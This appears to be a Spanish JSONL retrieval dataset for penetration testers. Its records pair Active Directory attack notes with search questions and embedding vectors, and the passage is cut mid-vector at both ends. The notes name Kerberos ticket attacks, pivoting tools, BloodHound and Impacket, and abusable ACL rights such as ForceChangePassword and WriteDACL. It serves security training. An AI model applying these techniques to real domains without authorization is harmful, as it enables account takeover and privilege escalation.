0.02578, -0.04491, 0.04698, 0.00293, 0.02565, -0.00744, -0.01559, 0.06839, 0.06775, -0.05157, 0.06502, -0.00418, -0.05442, -0.00531, 0.04211, -0.04079, -0.01034, -0.01582, 0.05803, 0.04906, 0.06787, -0.02637, 0.01925, -0.02612, 0.02437, 0.06293, -0.00268, 0.034, 0.01482, 0.04308, 0.03741, 0.01437, 0.03248, 0.01507, 0.02718, 0.02337, -0.02823, -0.00723, 0.06314, 0.08046, 0.0186, 0.0278, -0.04504, 0.00302, -0.10306, -0.02232, 0.00844, -0.02301, -0.00823, 0.03459, -0.0013, 0.0274, 0.01068, -0.05309]} -{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Conceptos\n- Kerberos (TGT/TGS) Β· Pass-the-Hash Β· Golden Ticket Β· Silver Ticket\n- Crackear los tickets β†’ Cracking de contraseΓ±as\n- Entrar a la red interna β†’ Pivoting ligolo-ng / Tunneling", "indexar": "que herramienta puedo usar para montar un tunnel hacia la red interna?", "v": [-0.07514, 0.00543, -0.28147, -0.17167, -0.10597, 0.01001, -0.14725, 0.05821, 0.02233, -0.00609, -0.19573, -0.03077, 0.09241, 0.04068, -0.00024, 0.06432, 0.0124, -0.07871, 0.11928, -0.05959, -0.13555, -0.10186, -0.1073, -0.02371, -0.02928, 0.06387, 0.01134, -0.08643, -0.17231, -0.06372, 0.02328, 0.0341, 0.14134, -0.01301, -0.10749, -0.11698, -0.00651, 0.08628, 0.00237, 0.00881, -0.07349, 0.02443, -0.10539, 0.02584, 0.08851, -0.01086, 0.04255, -0.0885, -0.07855, 0.06312, -0.00356, -0.12415, -0.16658, -0.08032, 0.02542, -0.16468, 0.12951, -0.07677, 0.01715, -0.06037, -0.01168, 0.03764, -0.05444, 0.1146, 0.01168, -0.06259, -0.01676, -0.02246, -0.13546, 0.08256, -0.0583, 0.02732, -0.03352, 0.10469, 0.03189, 0.04246, -0.0144, -0.03738, 0.06451, 0.02671, 0.01378, 0.06968, -0.00346, 0.05807, 0.00499, -0.06888, 0.08093, -0.07203, 0.02933, -0.05139, -0.11338, 0.00916, 0.02606, -0.04543, 0.08102, -0.07423, 0.00203, 0.04556, -0.00349, -0.11045, 0.05036, 0.00033, -0.0609, 0.12814, 0.05741, 0.00972, -0.02493, -0.0654, 0.04421, 0.0016, 0.06526, 0.06865, -0.01373, -0.04691, -0.05776, -0.01442, -0.00489, -0.02305, -0.05109, -0.05211, 0.03965, 0.02004, -0.06311, -0.02795, 0.00062, -0.06446, 0.027, 0.0557, -0.03696, 0.00278, -0.03696, 0.03731, -0.04892, -0.03856, -0.077, 0.05721, -0.02822, -0.12033, -0.00202, -0.00868, 0.0144, -0.04397, -0.07332, -0.12537, 0.01414, 0.08385, -0.03473, -0.09892, 0.03138, -0.00245, 0.04931, -0.03464, 0.00355, -0.0154, -0.01033, -0.00754, -0.02202, 0.03524, -0.06981, 0.11372, -0.06521, -0.05463, -0.00256, 0.0043, 0.0018, -0.07526, -0.01754, -0.05582, 0.03619, -0.01675, 0.09588, 0.05214, -0.02175, 0.00049, 0.05695, -0.06074, -0.08239, -0.04901, -0.00918, -0.05935, 0.02487, -0.08157, -0.02894, 0.00372, 0.00062, -0.06965, 0.02418, -0.01831, 0.03111, 0.03494, -0.05631, 0.01687, 0.04617, 0.01506, 0.02915, 0.0198, 0.02053, -0.0606, 0.04233, -0.0418, -0.06039, 0.01532, -0.00473, -0.04443, 0.02771, 0.01954, -0.0311, 0.01871, 0.02967, 0.08841, 0.09009, -0.05927, 0.01768, -0.03953, 0.01538, 0.00981, 0.03327, 0.0613, -0.05549, -0.00667, 0.06852, 0.042, 0.048, 0.01063, -0.04699, 0.04254, -0.03963, -0.00093, -0.05381, 0.01193, 0.059, 0.00134, -0.03791, -0.00941, 0.00074, -0.05514, 0.03237, 0.04781, -0.04086, -0.01164, 0.00194, 0.05665, 0.00217, 0.02011, -0.03601, 0.0099, 0.0138, 0.00961, -0.02483, -0.08047, -0.02674, 0.01435, 0.00149, -0.06162, 0.03857, -0.00264]} -{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Herramientas\nNetExec/CrackMapExec, BloodHound, Rubeus, Kerbrute, Responder, Evil-WinRM, Impacket β†’ Herramientas (Γ­ndice).\n\nRelacionado: OSCP MOC", "indexar": "que herramienta sirve para escanear vulnerabilidades en redes Windows?", "v": [0.00167, -0.05429, -0.16127, -0.19892, 0.03366, -0.06045, -0.18084, -0.13411, 0.08688, -0.10508, -0.01105, -0.1513, -0.06945, -0.11092, 0.01812, 0.10478, -0.01397, -0.09082, 0.10662, 0.02039, -0.05198, -0.02795, -0.08958, -0.01466, -0.1211, 0.03716, -0.00826, -0.00849, -0.15912, 0.02651, -0.05589, 0.01053, 0.03654, -0.0262, -0.09884, 0.03244, -0.04021, 0.07484, 0.06159, 0.07524, 0.06901, 0.09376, -0.09017, 0.00926, 0.08101, -0.00225, -0.06249, -0.05912, 0.03329, 0.10341, -0.09859, -0.1137, -0.16889, -0.0121, -0.01293, -0.10802, 0.19825, -0.10478, -0.00726, -0.02412, -0.09207, 0.06865, -0.00895, -0.01679, 0.0082, -0.02447, 0.00909, 0.01642, -0.06889, 0.15261, -0.02552, 0.07187, 0.06081, -0.04153, -0.00226, 0.02632, -0.03983, 0.04871, 0.04062, 0.02491, 0.0724, 0.0598, -0.03843, -0.01441, -0.11573, -0.09821, 0.08311, -0.03229, 0.06851, -0.12051, 0.06298, 0.03555, -0.09283, 0.02803, 0.0351, -0.03993, 0.06456, -0.08924, -0.01243, -0.01532, 0.00259, -0.10226, -0.0426, 0.06665, -0.0279, 0.08256, -0.05379, -0.05356, -0.05698, -0.06568, 0.04804, 0.07361, -0.04391, 0.00188, -0.05007, 0.08278, -0.01203, -0.03875, 0.05723, 0.02756, -0.0003, -0.03183, -0.09395, -0.01881, 0.00538, 0.00229, -0.04554, 0.07625, -0.01818, -0.05634, 0.01218, -0.0333, -0.06621, 0.00206, -0.07484, -0.01076, -0.00415, -0.1524, -0.02742, -0.09051, 0.04424, 0.0306, -0.0219, -0.07083, 0.00441, 0.108, 0.11244, -0.04629, -0.0539, -0.01156, 0.07427, -0.03441, -0.10837, 0.01017, -0.06071, 0.04852, -0.08432, 0.06426, -0.05206, 0.04436, -0.0168, -0.02107, 0.03336, 0.00331, -0.01125, -0.01711, 0.0101, 0.06947, 0.08335, 0.02533, -0.00969, 0.11177, 0.02009, -0.04071, 0.01886, -0.01613, 0.01386, 0.01097, -0.03485, -0.04842, -0.07641, -0.04647, 0.01581, -0.0164, 0.02792, -0.00865, 0.0034, 0.01456, -0.0326, 0.03729, -0.07591, -0.03603, 0.0391, -0.01015, 0.06145, -0.02568, -0.02629, -0.03092, 0.06206, -0.01402, -0.06576, -0.01611, -0.03847, -0.04122, 0.07716, 0.07744, -0.01037, -0.07098, 0.04779, 0.08767, -0.01301, -0.01024, 0.01271, -0.05467, -0.01318, -0.08509, 0.06483, 0.02659, -0.01846, -0.0299, 0.001, -0.02287, 0.04239, 0.02835, -0.01876, 0.03219, -0.09078, -0.06976, -0.01488, -0.04736, 0.06995, -0.07027, -0.03939, -0.0159, 0.0067, -0.07551, 0.02181, -0.01638, -0.03666, -0.01431, -0.05557, 0.00713, -0.01445, -0.03712, -0.04439, -0.06182, -0.00473, -0.02477, -0.01778, -0.0811, -0.02914, 0.00726, 0.04699, -0.04443, -0.00636, -0.02332]} -{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Herramientas\nNetExec/CrackMapExec, BloodHound, Rubeus, Kerbrute, Responder, Evil-WinRM, Impacket β†’ Herramientas (Γ­ndice).\n\nRelacionado: OSCP MOC", "indexar": "cual es una alternativa libre a CrackMapExec?", "v": [-0.20799, -0.05515, -0.01753, -0.05612, -0.03714, -0.10351, 0.03209, 0.12418, -0.07904, 0.00717, -0.09074, -0.23378, -0.02564, 0.00906, 0.12621, 0.10388, 0.00934, -0.01673, 0.10454, -0.00634, -0.05236, -0.01484, -0.14057, -0.01554, 0.02265, 0.04173, -0.09833, 0.02087, -0.10057, 0.00151, 0.03375, 0.11072, 0.02216, -0.00541, 0.04322, -0.02422, 0.25622, -0.04785, 0.089, -0.05974, -0.04545, -0.08398, -0.16456, 0.01412, 0.01504, -0.08184, -0.05191, 0.01621, -0.03949, -0.0293, -0.05627, -0.05264, -0.19901, -0.00364, 0.01465, 0.00918, 0.04966, -0.01787, -0.00631, -0.00164, 0.01141, 0.09641, 0.04304, 0.03161, 0.03731, -0.04155, -0.01341, 0.04106, -0.07815, 0.05521, 0.01101, 0.05066, 0.07759, -0.07904, -0.06669, -0.00921, -0.04464, -0.09075, 0.04248, 0.11209, 0.06399, -0.03501, -0.08131, 0.02489, -0.03041, 0.05598, 0.12575, -0.09286, -0.00069, 0.01677, 0.03525, -0.03164, -0.03273, 0.17506, 0.05988, -0.1477, 0.04918, 0.08782, -0.01854, 0.06404, 0.0621, -0.00863, -0.17261, 0.03128, 0.02902, -0.01225, 0.01612, 0.03894, -0.12992, 0.10964, 0.07843, 0.14991, -0.01757, 0.05911, 0.04573, -0.12536, -0.06374, 0.04465, -0.00225, -0.00952, -0.07584, -0.01758, -0.02738, -0.09287, 0.02684, 0.10447, -0.05856, 0.07977, 0.0275, 0.01991, 0.03319, -0.04643, -0.03974, -0.06384, -0.10646, -0.03322, 0.09432, -0.05903, 0.02097, 0.02056, -0.03576, 0.0407, 0.0334, -0.0292, -0.00427, 0.00512, -0.0098, 0.01627, 0.00332, -0.00085, -0.05263, 0.07041, 0.02599, 0.15375, -0.01402, 0.02151, 0.00071, -0.0197, -0.03326, 0.03705, 0.0384, -0.02046, -0.04479, 0.04822, -0.02306, 0.00166, 0.06463, -0.00912, -0.01912, 0.03107, -0.03743, 0.10157, 0.07293, -0.05276, -0.00285, -0.10447, 0.0096, -0.08839, 0.05678, -0.02283, 0.00526, 0.00395, -0.00437, 0.0612, -0.04369, -0.00549, 0.01895, 0.00264, 0.02151, -0.04086, -0.03255, 0.05836, -0.00012, -0.07165, -0.04311, -0.02998, 0.05637, -0.04108, -0.0256, -0.02102, -0.04484, -0.0423, -0.00706, -0.04903, 0.01792, 0.02351, 0.04767, 0.01815, 0.01415, 0.07401, 0.005, -0.00252, 0.05779, -0.00965, -0.02575, 0.01669, 0.05078, 0.00605, -0.0298, -0.02849, -0.01354, 0.03786, 0.03014, -0.01952, 0.01433, 0.04596, 0.02817, 0.03403, -0.01719, 0.01878, 0.04569, 0.01048, -0.00231, 0.03729, 0.05594, 0.00673, 0.00845, -0.0106, 0.02919, -0.04541, 0.06165, 0.06228, -0.05329, -0.00382, -0.05214, -0.04266, -0.00544, -0.05033, -0.05127, -0.07945, -0.01753, 0.01758, 0.0514, -0.00418, 0.00747, 0.00708]} -{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Herramientas\nNetExec/CrackMapExec, BloodHound, Rubeus, Kerbrute, Responder, Evil-WinRM, Impacket β†’ Herramientas (Γ­ndice).\n\nRelacionado: OSCP MOC", "indexar": "con que puedo montar un ataque de fuerza bruta contra cuentas de dominio?", "v": [0.08297, 0.02346, -0.16018, -0.06634, -0.15795, 0.10324, 0.12984, 0.05951, -0.18412, -0.02994, -0.03469, -0.04178, -0.00652, 0.03448, -0.01712, -0.09343, 0.07883, -0.04926, -0.06364, -0.15548, 0.01743, -0.22223, 0.14875, -0.08911, -0.04064, -0.026, -0.01399, 0.08359, -0.07037, 0.02813, 0.0642, 0.04255, 0.11435, 0.02886, 0.10829, -0.06799, -0.06485, 0.04691, 0.20531, 0.10087, -0.00311, 0.00192, -0.13047, 0.01561, -0.04906, -0.00673, -0.03543, 0.02071, 0.01161, -0.01344, 0.04048, -0.02369, -0.16563, -0.01286, -0.13644, -0.1023, 0.04011, -0.05728, -0.05225, 0.00944, -0.07044, 0.04819, -0.00688, 0.00625, -0.04988, -0.02646, -0.04207, 0.03366, -0.03837, -0.02218, -0.10633, -0.05869, -0.05426, 0.00233, -0.02199, -0.05486, 0.09361, 0.00543, -0.04845, -0.02758, -0.05785, -0.03505, -0.14341, 0.03438, -0.10668, -0.08292, -0.04223, -0.14474, 0.00194, -0.00251, 0.04534, -0.03379, -0.06335, -0.02427, -0.09866, 0.00797, 0.01672, -0.00671, -0.04837, -0.08469, -0.05565, 0.04054, -0.09432, 0.0017, 0.17194, 0.04949, -0.02744, -0.07862, 0.04629, -0.01121, -0.02989, -0.08357, -0.15562, 0.01387, -0.03093, -0.01028, -0.15173, 0.01793, 0.02068, 0.03197, -0.06976, -0.01533, 0.02594, 0.10625, -0.0633, -0.01477, 0.04848, -0.00152, -0.04024, -0.10534, 0.00082, -0.02373, 0.07991, -0.03915, 0.01365, 0.05129, -0.03737, -0.07145, -0.05583, -0.0141, -0.00571, 0.04522, -0.03075, -0.08934, 0.00347, 0.00348, 0.01208, -0.09058, -0.08947, 0.05616, 0.05685, -0.02239, 0.00285, 0.09123, -0.06299, 0.00037, 0.02216, -0.01785, -0.02295, 0.07357, -0.05408, 0.01769, -0.11468, 0.03533, 0.01703, -0.02892, -0.06648, -0.02416, 0.06505, -0.00494, -0.04831, 0.05675, 0.05663, 0.04804, 0.03201, -0.06956, -0.02885, 0.00094, -0.00663, 0.0232, -0.02504, -0.05602, -0.00679, 0.03279, -0.04496, 0.04526, 0.06541, 0.02192, 0.02609, 0.01964, 0.00257, 0.04987, -0.06578, 0.04887, 0.00162, -0.07006, -0.04235, 0.06304, 0.00638, 0.01276, 0.00886, -0.03481, -0.0276, 0.01778, 0.02332, 0.04398, -0.01064, 0.02131, 0.0002, -0.01781, 0.02346, -0.02708, 0.03559, -0.10644, -0.07296, -0.00222, -0.01132, -0.02283, -0.00579, 0.0215, -0.03874, 0.06109, 0.02739, 0.00196, 0.02506, -0.0049, 0.00569, -0.10758, 0.04393, 0.04651, -0.04305, -0.03524, 0.00549, -0.00441, -0.02938, -0.00195, 0.07867, 0.03045, -0.05191, 0.05128, -0.03047, 0.03686, 0.04358, -0.06987, -0.0963, -0.03491, -0.06112, 0.02523, -0.0456, -0.03186, 0.02492, 0.04075, 0.0261, 0.00313, 0.00938, -0.01095]} -{"tipo": "pregunta", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# ACL abuses\n\n> Permisos mal configurados sobre objetos de AD que te dejan escalar. **BloodHound te los pinta** como aristas. Camino de Active Directory.", "indexar": "que herramienta sirve para ver el mapa de las relaciones entre usuarios y computadoras en una red?", "v": [0.06898, 0.07254, -0.04716, -0.2282, -0.01757, -0.19104, -0.07043, -0.02905, 0.06477, -0.1164, -0.11345, -0.13892, 0.0255, -0.08204, 0.09562, 0.03423, 0.06554, 0.00974, 0.08812, -0.0483, 0.03757, -0.05039, -0.05802, 0.05234, -0.08547, 0.12551, 0.06533, -0.0821, -0.09489, 0.11711, 0.00354, -0.02416, -0.005, -0.05145, -0.11266, -0.01291, 0.05389, 0.04605, -0.00542, 0.07137, -0.01446, -0.00876, -0.04434, -0.03221, 0.10548, 0.02926, -0.07908, -0.07892, 0.01047, 0.09716, -0.14711, -0.14822, -0.15597, -0.03883, -0.03799, -0.13064, 0.14823, -0.07784, 0.06348, -0.08031, -0.12159, -0.00516, -0.03172, -0.01434, -0.03158, 0.01135, -0.00988, -0.01987, -0.08962, 0.12911, -0.02305, 0.09991, -0.0092, -0.07305, 0.0199, 0.05865, 0.00961, 0.01875, 0.0299, -0.04679, 0.04169, 0.00344, -0.11017, 0.01621, -0.08448, -0.09722, 0.09123, -0.01448, 0.02728, -0.05109, 0.03163, 0.14643, 0.01161, -0.01648, 0.14733, -0.03535, 0.04108, -0.02994, -0.01486, -0.01095, 0.17597, -0.01968, -0.06794, 0.08152, -0.10152, 0.055, 0.05704, -0.03545, 0.0519, -0.02205, 0.11391, 0.006, 0.02556, -0.01639, -0.05732, 0.00238, 0.0262, -0.02008, -0.03161, -0.06002, -0.0525, 0.02608, 0.0089, -0.0212, -0.03458, 0.02871, 0.00431, 0.02584, -0.02793, -0.08401, -0.0138, -0.06966, -0.08973, -0.03985, -0.02415, -0.04123, -0.03028, -0.10282, 0.01058, -0.07977, 0.03284, 0.11897, -0.0881, -0.1552, -0.02923, 0.12258, 0.07741, -0.02132, -0.04728, 0.00125, 0.00284, -0.05158, -0.05958, 0.01103, -0.01795, 0.05854, -0.05156, 0.0396, -0.11064, 0.0058, -0.0496, -0.01691, 0.09176, 0.02056, 0.04319, -0.03583, -0.05065, 0.03546, 0.09548, 0.05349, -0.01807, 0.02808, 0.01352, -0.04045, -0.01963, -0.06776, 0.00231, -8e-05, -0.04958, -0.04279, 0.02028, -0.01266, -0.02302, -0.01346, -0.05739, -0.02827, -0.04282, -0.0129, 0.01477, -0.02283, -0.03334, 0.02856, 0.05042, 0.00273, 0.08331, 0.00718, -0.01696, 0.03207, 0.01337, -0.04942, -0.01249, -0.02221, -0.03913, 0.02501, 0.00527, 0.0962, 0.00412, -0.04932, 0.00357, 0.0231, 6e-05, 0.00949, -0.02951, -0.03596, -0.06985, -0.08383, 0.03782, 0.00384, 0.05315, -0.05054, 0.07753, -0.01931, 0.022, -0.0393, 0.03272, -0.00325, 0.02054, -0.01648, -0.00881, -0.04882, 0.03935, -0.05129, 0.015, -0.02357, 0.01206, -0.03748, 0.07905, -0.05279, -0.03706, -0.03939, -0.00376, 0.03472, 0.01012, -0.05828, -0.0424, -0.02878, -0.03258, -0.06279, -0.03807, -0.08133, -0.04666, -0.0088, 0.05931, -0.02894, -0.00342, 0.04877]} -{"tipo": "pregunta", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# ACL abuses\n\n> Permisos mal configurados sobre objetos de AD que te dejan escalar. **BloodHound te los pinta** como aristas. Camino de Active Directory.", "indexar": "cual es un programa que detecta permisos mal configurados en Active Directory?", "v": [0.13509, 0.14084, -0.09088, -0.21701, 0.11898, -0.07374, -0.0019, -0.03687, -0.19328, -0.08071, 0.05585, -0.0567, -0.10343, -0.09879, 0.05831, -0.07687, 0.1312, -0.07263, -0.01301, -0.0088, 0.0004, -0.05984, -0.01722, 0.02881, 0.03255, 0.02246, -0.01441, -0.03797, -0.1028, -0.11436, 0.07245, -0.00311, 0.08091, -0.05088, 0.07391, 0.02233, -0.05258, -0.02013, 0.04782, 0.0757, -0.0146, -0.02193, -0.12611, 0.03269, 0.09556, -0.0081, 0.0094, -0.11172, -0.01708, 0.00867, -0.01155, 0.04889, -0.05495, -0.02823, 0.13438, -0.05043, 0.08177, -0.09903, 0.00848, -0.05429, -0.00122, -0.05173, 0.01926, 0.00149, -0.08477, -0.01637, 0.1974, 0.00518, -0.0479, 0.00601, 0.05485, 0.03643, 0.062, 0.05204, 0.09425, 0.02044, -0.0167, -0.06741, 0.05222, 0.04403, 0.07125, -0.01857, -0.02995, 0.00876, -0.16811, -0.13885, 0.01206, -0.07627, -0.01226, -0.02211, 0.05015, 0.09244, -0.00803, 0.10865, 0.08768, -0.00483, 0.14553, 0.11438, 0.01947, 0.09311, 0.0188, 0.00286, -0.07945, 0.17842, -0.04958, 0.1429, 0.01423, 0.02417, -0.05536, 0.06157, 0.01951, -0.01383, 0.00234, -0.05384, 0.03331, 0.08781, 0.00677, -0.04624, 0.02716, -0.05476, -0.10172, 0.0084, 0.00887, 0.06786, 0.05707, 0.03476, -0.06435, 0.0853, -0.00063, 0.10406, 0.01867, 0.00311, 0.0463, -0.0836, -0.1137, -0.01779, -0.06322, 0.00197, -0.08864, -0.03576, 0.00512, 0.03648, 0.15222, 0.07689, 0.06244, 0.02223, -0.02446, 0.00793, -0.05782, 0.03388, -0.00067, 0.05627, 0.02997, 0.06239, -0.04874, 0.06588, -0.03832, -0.04583, -0.08956, 0.08797, -0.0045, 0.0074, -0.01164, -0.02537, 0.05756, -0.00555, -0.04957, 0.00732, 0.115, 0.09786, -0.0455, 0.05991, 0.0514, -0.08467, -0.01784, -0.02152, 0.02084, -0.09178, 0.06141, 0.0116, -0.08784, 0.03494, 0.03077, -0.01443, -0.01485, 0.00043, -0.00951, 0.012, 0.01804, 0.00564, 0.02388, 0.04119, -0.00532, -0.07187, 0.01569, -0.02585, 0.02312, -0.03694, -0.00827, -0.06026, 0.00407, 0.01551, -0.00205, -0.04299, 0.03404, 0.00306, -0.01155, 0.06446, 0.07794, 0.06565, -0.04055, -0.04887, 0.07416, 0.02202, -0.09479, 0.00735, -0.01371, 0.04746, 0.00887, 0.01458, 0.02108, -0.00739, 0.07685, 0.02472, 0.02221, -0.01518, 0.0368, 0.05055, 0.05918, 0.05474, -0.01525, -0.05083, -0.00644, -0.04291, 0.01975, 0.01553, 0.02434, -0.01687, -0.0092, -0.05098, 0.02514, 0.05887, 0.05742, -0.04549, -0.03746, 0.00557, -0.02715, 0.02016, 0.00863, -0.02142, 0.00966, 0.06916, 0.03928, -0.08466, 0.04577, -0.0138]} -{"tipo": "pregunta", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# ACL abuses\n\n> Permisos mal configurados sobre objetos de AD que te dejan escalar. **BloodHound te los pinta** como aristas. Camino de Active Directory.", "indexar": "con que puedo visualizar los posibles caminos de escalada dentro de un dominio?", "v": [0.17044, 0.10992, -0.19339, 0.0124, -0.09108, -0.01167, 0.04691, 0.02177, -0.07204, -0.10651, 0.1352, -0.07726, -0.04493, -0.08198, 0.05275, -0.0179, 0.18603, 0.04937, -0.01118, -0.0536, -0.01615, -0.13392, -0.00265, 0.01952, 0.10987, -0.07875, -0.05255, 0.01186, -0.0129, -0.03306, 0.07605, 0.11319, 0.04984, -0.04604, 0.02272, -0.13118, -0.03028, 0.06378, 0.04737, -0.09767, -0.06866, 0.01139, -0.0648, -0.10664, -0.07722, -0.07911, -0.09471, -0.0901, -0.01906, -0.18226, -0.00625, -0.07267, -0.08363, -0.13519, 0.07616, 0.00999, 0.19193, -0.00826, 0.00905, -0.08358, 0.0378, -0.00208, 0.0222, 0.059, -0.05711, -0.0934, -0.0206, 0.08667, -0.05524, -0.02068, -0.06118, -0.01564, 0.03377, 0.03203, 0.04583, -0.0236, 0.0219, 0.02561, 0.0869, 0.03268, 0.13554, -0.00615, -0.05797, 0.06025, -0.15264, -0.14596, -0.06273, -0.0707, 0.13726, 0.01952, 0.05088, 0.01396, -0.01179, -0.02339, -0.04394, 0.03283, 0.00338, -0.06655, -0.04081, 0.03115, -0.06491, 0.06569, -0.05723, 0.07304, 0.07761, 0.08038, 0.05743, -0.05709, -0.00294, -0.00257, 0.02405, 0.01894, -0.08867, -0.05441, -0.12278, 0.00684, -0.10108, -0.03617, -0.01749, -0.0947, -0.01983, -0.04833, -0.03613, 0.04139, 0.01816, -0.0375, -0.044, 0.0114, -0.02617, -0.08439, -0.02261, 0.02785, 0.03208, -0.01599, -0.01106, 0.06454, 0.01086, 0.00958, 0.05638, -0.03363, 0.10832, 0.02864, -0.04665, -0.092, 0.03411, -0.00505, -0.06337, -0.10821, -0.06698, -0.01567, -0.07187, 0.05934, -0.00246, 0.12965, 0.10044, 0.04493, -0.02945, -0.01731, -0.01973, 0.13648, -0.02602, 0.08534, -0.0473, 0.04338, 0.01125, -0.03963, 0.02186, 0.00107, -0.04505, -0.04474, -0.04821, 0.03509, -0.01209, 0.01549, 0.03122, -0.01367, -0.07397, -0.04116, 0.04779, 0.05843, -0.06447, -0.02932, 0.01035, 0.00145, -0.04445, 0.02387, 0.0181, -0.03798, 0.00773, 0.04193, -0.02858, 0.0358, -0.05807, 0.00929, -0.0142, -0.08398, 0.04501, 0.05163, -0.0163, -0.00437, -0.03275, -0.05599, 0.01254, -0.03717, -0.02276, -0.05861, -0.05274, 0.0367, 0.0071, 0.05073, 0.03153, -0.0779, 0.0469, -0.05983, -0.02228, -0.02178, 0.01571, 0.01596, -0.07151, -0.04455, -0.04691, 0.13771, 0.09494, -0.06622, 0.03613, -0.00023, -0.01396, -0.01727, -0.00843, 0.02241, -0.03103, 0.00314, -0.0445, 0.0018, 0.04339, 0.02554, 0.03846, 0.02074, -0.02238, -0.02496, -0.04756, 0.07216, 0.03111, -0.01032, -0.07189, -0.06728, -0.0443, 0.06757, -0.00208, -0.06733, 0.00854, -0.00325, -0.00164, 0.04585, -0.01187, -0.02181]} -{"tipo": "pregunta", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Las aristas peligrosas\n```\nGenericAll β†’ control total sobre el objeto\nWriteDACL β†’ te das a ti mismo cualquier permiso\nAddMember β†’ te metes en un grupo (ej. Domain Admins)\nForceChangePassword β†’ cambias la pass de otro usuario sin saber la actual\nGenericWrite β†’ modificar atributos (ej. aΓ±adir SPN β†’ Kerberoasting dirigido)\n```", "indexar": "que programa me permite forzar el cambio de contraseΓ±a de un usuario sin conocerla?", "v": [-0.0377, 0.05065, -0.20671, -0.20244, 0.00549, -0.07123, -0.0738, -0.11212, -0.12128, -0.13756, 0.0792, -0.02613, -0.00999, -0.10042, -0.05173, -0.00177, 0.15306, 0.06637, 0.09755, 0.06977, 0.10477, -0.02446, 0.03752, -0.1122, -0.07025, -0.04967, 0.03105, -0.12297, -0.02163, -0.06026, 0.00586, -0.03864, 0.06294, -0.0007, 0.08263, 0.09833, 0.12872, -0.01646, 0.11283, 0.0471, 0.10773, 0.06073, 0.0017, 0.13034, 0.00012, 0.0969, -0.02715, -0.01998, 0.05714, -0.00527, -0.0653, -0.04172, -0.06423, -0.04215, 0.05956, -0.14196, 0.14244, -0.03744, -0.01919, -0.05624, 0.00207, 0.02353, 0.07883, 0.08773, -0.04941, -0.06329, 0.03923, 0.06566, -0.09605, 0.12683, 0.04173, -0.01508, -0.04903, -0.08096, 0.02962, -0.00931, 0.05677, -0.05814, 0.05347, 0.0446, -0.07279, -0.02894, 0.0228, 0.07978, -0.08437, 0.05236, 0.09048, -0.07132, 0.04592, -0.03943, 0.04265, 0.0424, 0.05097, 0.09804, 0.05525, -0.06439, 0.04884, -0.03254, -0.08907, 0.0128, 0.06933, 0.01017, -0.08064, 0.17999, -0.03828, 0.01618, 0.02132, -0.06057, -0.02331, -0.02229, 0.06693, 0.03102, -0.02716, -0.09127, -0.04073, 0.08535, -0.00018, -0.10709, 0.00674, -0.04426, -0.14679, -0.02576, -0.03255, 0.01495, 0.08433, 0.02094, -0.01049, 0.10587, -0.05748, 0.00369, -0.00552, -0.00266, -0.00775, 0.01987, -0.02767, -0.04005, -0.04542, -0.06192, -0.08633, -0.01893, -0.01079, 0.04897, -0.00097, 0.01197, 0.04384, -0.04724, 0.06105, -0.08315, -0.07513, 0.06126, -0.00831, -0.01985, 0.02424, 0.03655, -0.06362, 0.0321, -0.04865, -0.08438, -0.03684, 0.05255, -0.07965, -0.04208, -0.01671, -0.06102, -0.03277, -0.08296, 0.03836, 0.02543, 0.10385, 0.05964, -0.0133, 0.09809, 0.01971, -0.02204, 0.01719, 0.00974, -0.03576, -0.0741, -0.00356, -0.06064, -0.06175, -0.00065, 0.02281, -0.01962, -0.01412, -0.0912, -0.02283, 0.04029, -0.02477, -0.01429, 0.02959, 0.04333, -0.03651, 0.03209, 0.00443, -0.04426, -0.03858, -0.01867, 0.01663, -0.09581, -0.02978, -0.02976, -0.00569, -0.05181, 0.0394, 0.03152, -0.06732, -0.02084, 0.02414, 0.02636, 0.06048, -0.07298, 0.05762, 0.00588, -0.04648, -0.08014, 0.03111, 0.0703, 0.04036, 0.00442, 0.0444, 0.02743, 0.0587, 0.07724, -0.02185, -0.07696, 0.00194, 0.01887, -0.00507, -0.00937, -0.02327, 0.00447, -0.0223, -0.05406, 0.13235, -0.00197, -0.07966, -0.04445, -0.0579, -0.08564, -0.0488, 0.07295, -0.00049, -0.09683, -0.03381, 0.01948, -0.08658, 0.03658, -0.01028, 0.00685, -0.04847, 0.017, 0.04258, -0.06733, 0.02578, 0.02991]} -{"tipo": "pregunta", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Las aristas peligrosas\n```\nGenericAll β†’ control total sobre el objeto\nWriteDACL β†’ te das a ti mismo cualquier permiso\nAddMember β†’ te metes en un grupo (ej. Domain Admins)\nForceChangePassword β†’ cambias la pass de otro usuario sin saber la actual\nGenericWrite β†’ modificar atributos (ej. aΓ±adir SPN β†’ Kerberoasting dirigido)\n```", "indexar": "con que herramienta puedo escribir permisos en los objetos para obtener control total sobre ellos?", "v": [0.01862, 0.15197, -0.12613, -0.21544, 0.01985, -0.13203, -0.12319, 0.01845, -0.01849, -0.15275, -0.04612, -0.04447, 0.13041, -0.07181, 0.09028, 0.00314, 0.17906, -0.07828, -0.06105, 0.06248, 0.0559, -0.02699, -0.12047, 0.01725, -0.05685, -0.02655, 0.032, 0.02769, -0.19792, 0.09516, -0.07869, 0.04657, 0.05166, -0.05011, -0.05577, -0.03441, -0.04078, 